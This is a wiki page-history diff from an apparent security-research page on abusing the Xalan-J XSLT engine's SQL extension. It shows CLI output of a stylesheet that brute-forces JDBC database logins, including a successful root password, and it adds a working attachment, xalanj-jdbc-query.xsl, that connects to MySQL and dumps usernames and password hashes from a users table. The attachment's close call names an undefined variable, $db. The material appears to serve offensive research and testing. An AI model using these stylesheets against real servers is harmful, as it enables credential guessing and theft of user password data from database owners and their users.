Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 60.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:08
Change comment: There is no comment for this version
To version Icon 62.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:13
Change comment: Upload new attachment xalanj-jdbc-query.xsl

Summary

Details

Icon Page properties
Content
... ... @@ -75,14 +75,11 @@
75 75  
76 76  The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
77 77  
78 +
78 78  Here's the output when launched from the CLI :
79 -$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
80 +
81 +##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
80 80  Username : [root] / Password : [] :
81 81  Username : [root] / Password : [uberpasswd] :
82 82  Username : [root] / Password : [cnam] : OK !!
83 -Username : [pma] / Password : [pma] :
84 -
85 -
86 -
87 -
88 -
85 +Username : [pma] / Password : [pma] : ##
Icon xalanj-jdbc-query.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +848 bytes
Content
... ... @@ -1,0 +1,22 @@
1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 + xmlns:sql="org.apache.xalan.lib.sql.XConnection"
3 + extension-element-prefixes="sql"
4 + version="1.0">
5 +
6 +<xsl:output method="xml" indent="yes"/>
7 +
8 +<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/>
9 +<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/>
10 +<xsl:param name="user" select="'root'"/>
11 +<xsl:param name="pass" select="'14m31337'"/>
12 +<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/>
13 +
14 +<xsl:template match="/">
15 + <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/>
16 + <xsl:variable name="table" select='sql:query($dbh, $query)'/>
17 + <xsl:copy-of select="$table" />
18 + <xsl:value-of select="sql:close($db)"/>
19 +</xsl:template>
20 +
21 +</xsl:stylesheet>
22 +